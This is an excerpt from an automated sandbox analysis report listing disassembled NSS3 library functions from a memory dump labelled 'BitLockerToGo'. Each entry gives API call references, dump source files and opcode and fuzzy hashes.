                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3151F471A043019FEB108F65DC427AB77E5AF4230CF10C529E919AAB85E7F1D894CB6E
                                                                                                                                                                                                                                                                                                                                                          Function 6C712D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C712D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C712F70,?,?), ref: 6C712DF9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C712E2C
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E3A
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E52
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C77AAF9,?), ref: 6C712E62
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E70
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712E89
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712EBB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712ECB
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C712F3E
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C712F4C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a8f530ba61d4a9f689883bd208268ec5215491ec44456e122d5460577a42f19c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 407d1b34e169d39e137ca4c85727158c86b64381bba58cbbf530b112a6f28136
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8f530ba61d4a9f689883bd208268ec5215491ec44456e122d5460577a42f19c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C06194B5E04205CBEB00CFA8D989B9E77B5EF9A348F184038DC55A7B01E731E955CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C657C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2120,Function_00097E60,?,?,?,?,?,6C6CF9CF,6C6CFAD0,00000000), ref: 6C657C81
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C657CA0
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C657CB4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C657CCF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C657D04
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C657D1B
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(-00000050), ref: 6C657D82
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C657DF4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C657E0E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2305085145-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7f24509d4c13720461de97c90e6b98c8bb9c8acc4b61e4845a807e5d97ed2821
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cfe80681823dbbe1d750a35ffa3caf66392aeac2d4ad6f4c0ff26fcfa27050e9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f24509d4c13720461de97c90e6b98c8bb9c8acc4b61e4845a807e5d97ed2821
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512271A18200AFDF005F69EC44A6977F5EB42359FA5823AED0887721EB309861CB88
                                                                                                                                                                                                                                                                                                                                                          Function 6C5C4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D11
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D2A
                                                                                                                                                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D4A
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D57
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4D97
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4DBA
                                                                                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C5C4DD4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4DE6
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4DEF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 121f7a6caabbbba50fbf68ca7840e8cd08b8c7215d5bfb05fab647b6aff0f51f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a0ccf83a7f7c37ddb673d79aa2f601597207ee879c14a895d531156042c098cb
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 121f7a6caabbbba50fbf68ca7840e8cd08b8c7215d5bfb05fab647b6aff0f51f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80416DB1A05A15CFDB00EFB9D8889697BF4BF06314B054A6DD848DB711EB30D894CB86
                                                                                                                                                                                                                                                                                                                                                          Function 6C668F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FAF
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FD1
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FFA
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669013
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669042
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C66905A
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669073
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6690EC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669111
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2831689957-3076721864
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f860ac35608227cfb40fd8144b50a244791fb850a1c976722b4c7c612ad0d4f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9ea99f9db02156de8593b989378472e476d41e1c024c422c2a6e5c2d64dbebc5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f860ac35608227cfb40fd8144b50a244791fb850a1c976722b4c7c612ad0d4f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD519B74A04204CFCF00EF7AC488299BBF4BF4A318F1555A9DC489BB15EB31E885CB96
                                                                                                                                                                                                                                                                                                                                                          Function 6C64E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C64E93B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE075,00000000), ref: 6C64E94E
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C64E995
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C64E9A7
                                                                                                                                                                                                                                                                                                                                                          • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C64E9CA
                                                                                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(6C78933E), ref: 6C64EA17
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C64EA28
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C64EA3C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C64EA69
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
                                                                                                                                                                                                                                                                                                                                                          • String ID: http://
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3982757857-1121587658
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 881b7661844c14ce7d690a3c70cd9d081d7d3ef0e70fffe2518415d003557f88
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bfcd804a0888393e753e1e452428f9c288eff4b29066f5d56331d78a9a9bcc72
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 881b7661844c14ce7d690a3c70cd9d081d7d3ef0e70fffe2518415d003557f88
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA419E749496065BEF60CA688C407EAF7A5AF1731CF14C021DCA597FC1E2129587C3EE
                                                                                                                                                                                                                                                                                                                                                          Function 6C757CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757CE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757D36
                                                                                                                                                                                                                                                                                                                                                          • PR_Realloc.NSS3(?,00000080), ref: 6C757D6D
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757D8B
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C757DC2
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757DD8
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000080), ref: 6C757DF8
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757E06
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6acd421e92309261129fc801c86c3ba63913a8ec1983964586bf51176af1b012
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 35836bae8df422eb0b0e3146c401cac1efb81267fc922199a8886d23e00a9301
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6acd421e92309261129fc801c86c3ba63913a8ec1983964586bf51176af1b012
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141F9B16102059FDB04CF28CE95D6B37BAFF81318B55856CE8198B751DB31E921CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C664E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C664E90
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C664EA9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C664EC6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C664EDF
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3 ref: 6C664EF8
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C664F05
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C664F13
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C664F3A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                                                                                                                          • String ID: bUfl$bUfl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 326028414-2796572053
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a01fdeecdc9345af2e47ec5c157ae990df4dace2c84bfcc9b40d66d093dc2f65
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dec16062c4ba6fff451d5829aaaad7b8dff0da0f0909e516ece29e53a9f08a73
